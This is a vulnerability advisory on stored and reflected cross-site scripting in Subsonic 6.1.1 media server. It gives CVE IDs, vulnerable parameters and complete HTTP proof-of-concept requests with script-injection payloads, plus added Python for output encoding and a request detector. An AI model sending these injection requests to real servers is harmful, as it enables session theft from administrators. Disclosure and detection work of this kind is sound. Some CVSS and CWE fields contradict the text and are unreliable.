Subsonic is an open source web media server that enables the management of media resources such as music or videos. Its official website is www.subsonic.org. The version affected by the identified vulnerabilities is 6.1.1, released May 31, 2017.
Two types of cross-site scripting were identified within the Subsonic application: stored XSS and reflected XSS. These vulnerabilities are described in the following sections.
Stored Cross-Site Scripting (Version 6.1.1)
The Subsonic application is affected by 14 stored cross-site scripting (XSS) instances spread across different application features. Each one allows a JavaScript payload to be persisted inside a vulnerable page, where it is executed every time a user visits that page. Exploitation requires an authenticated user, and the payloads can be used to target administrators and steal their sessions.
CVE ID: CVE-2018-9282, CVE-2018-14688, CVE-2018-14689, CVE-2018-14690, CVE-2018-14691
Access Vector: Remote
Security Risk: Critical
Vulnerability: CWE-79
CVSS Base Score: 9.8
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
The podcast subscription form is affected by one stored cross-site scripting instance. No administrator access is required to exploit this instance. By injecting a JavaScript payload into the form, an attacker can manipulate user sessions or elevate privileges by targeting an administrative user. The weak parameter is add. The following payload can be used to inject code and verify the vulnerability:
<script>alert(/XSS/)</script>
The request below can be used to exploit the instance:
POST /podcastReceiverAdmin.view? HTTP/1.1
Host: HOST
Cookie: JSESSIONID=SESSIONID; DWRSESSIONID=SESSIONID2
add=http%3A%2F%2F%22%3E%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E
The music tags setting form is affected by three stored XSS instances. No administrator access is required to exploit these instances, but tag modification permission is required. By injecting a JavaScript payload into the form, an attacker can manipulate user sessions or elevate privileges by targeting an administrative user. The weak parameters are c0-param2, c0-param3, and c0-param4. The following payload can be used to inject code and verify the vulnerability:
"><script>alert(/XSS/)</script>
The request below could be used to exploit the instances:
POST /dwr/call/plaincall/tagService.setTags.dwr HTTP/1.1
Host: 192.168.1.36:4040
Cookie: JSESSIONID=SESSIONID; DWRSESSIONID=SESSIONID2
callCount=1
nextReverseAjaxIndex=0
c0-scriptName=tagService
c0-methodName=setTags
c0-id=0
c0-param0=string:65
c0-param1=string:1
c0-param2=string:%22%3E%3Cscript%3Ealert(%2FXSS1%2F)%3C%2Fscript%3E
c0-param3=string:%22%3E%3Cscript%3Ealert(%2FXSS2%2F)%3C%2Fscript%3E
c0-param4=string:%22%3E%3Cscript%3Ealert(%2FXSS3%2F)%3C%2Fscript%3E
c0-param5=string:
c0-param6=string:Bastard%20Pop
batchId=0
instanceId=0
page=%2FeditTags.view%3Fid%3D8
scriptSessionId=SESSIONID2
The internet radio settings form is affected by three stored XSS instances. Administrator access is required to exploit these instances. By injecting a JavaScript payload into the form, an attacker can manipulate user sessions. The weak parameters are name[x], streamUrl[x], and homepageUrl[x], where x is an integer. The following payload can be used to inject code and verify the vulnerability:
<script>alert(/XSS/)</script>
The request below could be used to exploit the instances:
POST /internetRadioSettings.view HTTP/1.1
Host: HOST
Cookie: JSESSIONID=SESSIONID; DWRSESSIONID=SESSIONID2
name%5B1%5D=%22%3Etest%22%3Cscript%3Ealert%28%2Fradioname%2F%29%3C%2Fscript%3E&streamUrl%5B1%5D=%22%3Etest%22%3Cscript%3Ealert%28%2Fradiostreamurl%2F%29%3C%2Fscript%3E&homepageUrl%5B1%5D=%22%3E%22%3Cscript%3Ealert%28%2Fradiohomepage%2F%29%3C%2Fscript%3E&enabled%5B1%5D=on&name=&streamUrl=&homepageUrl=&enabled=on
The general settings form is affected by two stored XSS instances. Administrator access is required to exploit these instances. By injecting a JavaScript payload, an attacker can manipulate user sessions. The weak parameters are title and subtitle. The following payload can be used to inject code and verify the instances:
<script>alert(/XSS/)</script>
The request below could be used to exploit the instances:
POST /generalSettings.view HTTP/1.1
Host: HOST
Cookie: JSESSIONID=SESSIONID; DWRSESSIONID=SESSIONID2
musicFileTypes=mp3+ogg+oga+aac+m4a+flac+wav+wma+aif+aiff+ape+mpc+shn&videoFileTypes=flv+avi+mpg+mpeg+mp4+m4v+mkv+mov+wmv+ogv+divx+m2ts&coverArtFileTypes=cover.jpg+cover.png+cover.gif+folder.jpg+jpg+jpeg+gif+png&playlistFolder=%2Fvar%2Fplaylists&index=A+B+C+D+E+F+G+H+I+J+K+L+M+N+O+P+Q+R+S+T+U+V+W+X-Z%28XYZ%29&ignoredArticles=The+El+La+Los+Las+Le+Les&shortcuts=New+Incoming+Podcast&localeIndex=0&themeIndex=0&sortAlbumsByYear=true&_sortAlbumsByYear=on&_gettingStartedEnabled=on&welcomeTitle=Welcome+to+Subsonic%21%22%3E%3Cscript%3Ealert%28%2Fwelcometitle%2F%29%3C%2Fscript%3E&welcomeSubtitle=%22%3E%3Cscript%3Ealert%28%2Fwelcomesubtitle%2F%29%3C%2Fscript%3E&welcomeMessage=Welcome+to+Subsonic%21%0D%0A%5C%5C+%5C%5C%0D%0ASubsonic+is+a+free%2C+web-based+media+streamer%2C+providing+ubiquitous+access+to+your+music.+%0D%0A%5C%5C+%5C%5C%0D%0AUse+it+to+share+your+music+with+friends%2C+or+to+listen+to+your+own+music+while+at+work.+You+can+stream+to+multiple+players+simultaneously%2C+for+instance+to+one+player+in+your+kitchen+and+another+in+your+living+room.%0D%0A%5C%5C+%5C%5C%0D%0ATo+change+or+remove+this+message%2C+log+in+with+administrator+rights+and+go+to+%7Blink%3ASettings+%3E+General%7CgeneralSettings.view%7D.%0D%0A&loginMessage=
The transcoding settings form is affected by five stored XSS instances. Administrator access is required to exploit these instances. By injecting a JavaScript payload, an attacker could manipulate user sessions. The weak parameters are name[x], sourceFormats[x], targetFormat[x], step1[x], and step2[x], where x is an integer. The following payload can be used to inject code and verify the instances:
<script>alert(/XSS/)</script>
The request below could be used to exploit the instances:
POST /transcodingSettings.view HTTP/1.1
Host: HOST
Cookie: JSESSIONID=SESSIONID; DWRSESSIONID=SESSIONID2
name%5B0%5D=mp3+audio&sourceFormats%5B0%5D=ogg+oga+aac+m4a+flac+wav+wma+aif+aiff+ape+mpc+shn&targetFormat%5B0%5D=mp3&step1%5B0%5D=ffmpeg+-i+%25s+-map+0%3A0+-b%3Aa+%25bk+-v+0+-f+mp3+-&step2%5B0%5D=&name%5B1%5D=%22%3E%3Cscript%3Ealert%28%2Fname%2F%29%3C%2Fscript%3E&sourceFormats%5B1%5D=%22%3E%3Cscript%3Ealert%28%2Fconvertfrom%2F%29%3C%2Fscript%3E&targetFormat%5B1%5D=%22%3E%3Cscript%3Ealert%28%2Fconvertto%2F%29%3C%2Fscript%3E&step1%5B1%5D=%22%3E%3Cscript%3Ealert%28%2Fstep1%2F%29%3C%2Fscript%3E&step2%5B1%5D=%22%3E%3Cscript%3Ealert%28%2Fstep2%2F%29%3C%2Fscript%3E&name=&sourceFormats=&targetFormat=&step1=&step2=&defaultActive=on&downsampleCommand=ffmpeg+-i+%25s+-map+0%3A0+-b%3Aa+%25bk+-v+0+-f+mp3+-
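As an added illustration that is not part of the advisory or of the Subsonic code base, the Python below shows why the "> payloads in the stored instances above work and how attribute-context HTML encoding, plus scheme validation for the URL-typed settings (podcast add, internet radio streamUrl and homepageUrl), neutralises them. The rendering templates are assumed, and the sample values are constructed from the advisory's own decoded payloads.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample values: the advisory's payloads after URL decoding.
PODCAST_URL = 'http://"><script>alert(/XSS/)</script>'
RADIO_NAME = '">test"<script>alert(/radioname/)</script>'
BENIGN_URL = "https://example.org/feed.xml"


def render_vulnerable(name, value):
    """Assumed flawed template: a stored value dropped into an attribute unencoded."""
    return f'<input type="text" name="{name}" value="{value}">'


def render_fixed(name, value):
    """Same template with attribute-context encoding: '"' becomes &quot; and '<'
    becomes &lt;, so the value can neither close the attribute nor open a tag."""
    return f'<input type="text" name="{name}" value="{html.escape(value, quote=True)}">'


class _TagCollector(HTMLParser):
    """Records the start tags a tokenizer finds in a rendered fragment."""
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def rendered_tags(markup):
    """Elements a browser-like parser would create from the fragment."""
    collector = _TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags


def is_acceptable_url(value):
    """Server-side check for URL-typed settings (podcast 'add', radio streamUrl and
    homepageUrl): reject markup characters outright, then require http(s) plus a host."""
    if any(ch in value for ch in '<>"\''):
        return False
    parts = urlsplit(value)
    return parts.scheme in ("http", "https") and bool(parts.netloc)
```

Output encoding is the actual fix for the rendering bug; the URL check only narrows what can be stored in the first place and does not replace it for free-text settings such as titles or radio names.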
The Subsonic application is affected by five reflected cross-site scripting (XSS) instances that require user interaction to be executed.
CVE ID: CVE-2018-14687, CVE-2018-14689, CVE-2018-14692
Access Vector: Remote
Security Risk: High
Vulnerability: CWE-352
CVSS Base Score: 8.8
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
The personal player settings form is affected by three cross-site scripting instances. By injecting a JavaScript payload into the vulnerable parameters, an attacker could use this page to manipulate the user session. The weak parameters are clone, id, and technologyName. The following payload can be used to inject code and verify the flaw:
<script>alert(/XSS/)</script>
The request below could be used to exploit the instances:
http://HOST/playerSettings.view?clone=%3cscript%3ealert(/XSS/)%3c%2fscript%3e
http://HOST/playerSettings.view?id=%3cscript%3ealert(/XSS/)%3c%2fscript%3e
POST /playerSettings.view HTTP/1.1
Host: HOST
Cookie: JSESSIONID=SESSIONID; DWRSESSIONID=SESSIONID2
playerId=3&technologyName=JUKEBOX%3cscript%3ealert(/XSS/)%3c%2fscript%3e&name=test&transcodeSchemeName=OFF&dynamicIp=true&_dynamicIp=on&autoControlEnabled=true&_autoControlEnabled=on&activeTranscodingIds=0&_activeTranscodingIds=on
The stream page is affected by one cross-site scripting instance. By injecting a JavaScript payload into the vulnerable parameter, an attacker can use this page to manipulate user sessions. The weak parameter is player. The following payload can be used to inject code and verify the instance:
<script>alert(/XSS/)</script>
The request below could be used to exploit the instance:
http://HOST/stream?player=%3Cscript%3Ealert(/XSS/)%3C/script%3E&id=79&auth=1289324648&suffix=.mp3
The network settings form is affected by one cross-site scripting instance. By injecting a JavaScript payload into the vulnerable parameter, an attacker can use this form to manipulate user sessions. The weak parameter is urlRedirectType. The following payload can be used to inject code and verify the instance:
<script>alert(/XSS/)</script>
The request below can be used to exploit the instance:
POST /networkSettings.view HTTP/1.1
Host: HOST
Cookie: JSESSIONID=SESSIONID; DWRSESSIONID=SESSIONID2
_portForwardingEnabled=on&urlRedirectionEnabled=true&_urlRedirectionEnabled=on&urlRedirectType=CUSTOM%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E&urlRedirectCustomUrl=http%3A%2F%2Ftest
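The following detector is an added example, not code from the advisory or from Subsonic: given raw HTTP request captures of the shape shown in the stored and reflected sections above (from a reverse proxy or WAF that records bodies; plain access logs do not carry POST bodies), it flags requests whose advisory-listed weak parameters carry HTML markup after URL decoding. The endpoint-to-parameter map is taken from the sample requests above, the DWR body handling is specific to the tagService.setTags.dwr call, and the sample captures are constructed.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit
# Endpoint -> weak parameters, as named in the advisory's requests; name[1] etc. match after stripping [x].
WEAK_PARAMS = {
    "/podcastReceiverAdmin.view": {"add"},
    "/dwr/call/plaincall/tagService.setTags.dwr": {"c0-param2", "c0-param3", "c0-param4"},
    "/internetRadioSettings.view": {"name", "streamUrl", "homepageUrl"},
    "/generalSettings.view": {"welcomeTitle", "welcomeSubtitle"},
    "/transcodingSettings.view": {"name", "sourceFormats", "targetFormat", "step1", "step2"},
    "/playerSettings.view": {"clone", "id", "technologyName"},
    "/stream": {"player"},
    "/networkSettings.view": {"urlRedirectType"},
}
# Tag openers, inline event handlers or javascript: URLs inside a decoded value.
MARKUP = re.compile(r"<\s*/?\s*[a-z]|\bon\w+\s*=|javascript:", re.I)

def parse_request(raw):
    """Raw HTTP text -> (path, {param: [values]}) from query string and body."""
    head, _, body = raw.partition("\n\n")
    method, target, _ = head.splitlines()[0].split(" ", 2)
    parts = urlsplit(target)
    params = parse_qs(parts.query, keep_blank_values=True)
    if method == "POST" and "/dwr/" in parts.path:   # DWR body: one key=value per line
        for line in body.splitlines():
            key, _, value = line.partition("=")
            params.setdefault(key, []).append(unquote(value))
    elif method == "POST":                            # ordinary form body
        for key, values in parse_qs(body, keep_blank_values=True).items():
            params.setdefault(key, []).extend(values)
    return parts.path, params

def find_xss_indicators(raw):
    path, params = parse_request(raw)
    hits = []   # (path, parameter, decoded value) for each weak parameter carrying markup
    for name, values in params.items():
        if re.sub(r"\[\d+\]$", "", name) not in WEAK_PARAMS.get(path, ()):
            continue
        for value in values:
            decoded = unquote(value)   # second decode also catches double encoding
            if MARKUP.search(decoded):
                hits.append((path, name, decoded))
    return hits

SAMPLE_REQUESTS = [  # constructed captures modelled on the advisory's requests, headers trimmed
    "POST /podcastReceiverAdmin.view HTTP/1.1\nHost: media.example\n\n"
    "add=http%3A%2F%2F%22%3E%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E",
    "POST /dwr/call/plaincall/tagService.setTags.dwr HTTP/1.1\nHost: media.example\n\n"
    "c0-param0=string:65\nc0-param2=string:%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E\nbatchId=0",
    "GET /playerSettings.view?clone=%3cscript%3ealert(/XSS/)%3c%2fscript%3e HTTP/1.1\n\n",
    "GET /stream?player=3&id=79&suffix=.mp3 HTTP/1.1\n\n",
]
```

Because the stored instances execute on every later page view, a hit on a settings endpoint is worth treating as a persisted change to inspect and revert, not only as a blocked request.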
Florian Nivette, Security Associate at Bishop Fox
8240 S. Kyrene Rd.
Suite A113
Tempe, AZ
85284
United States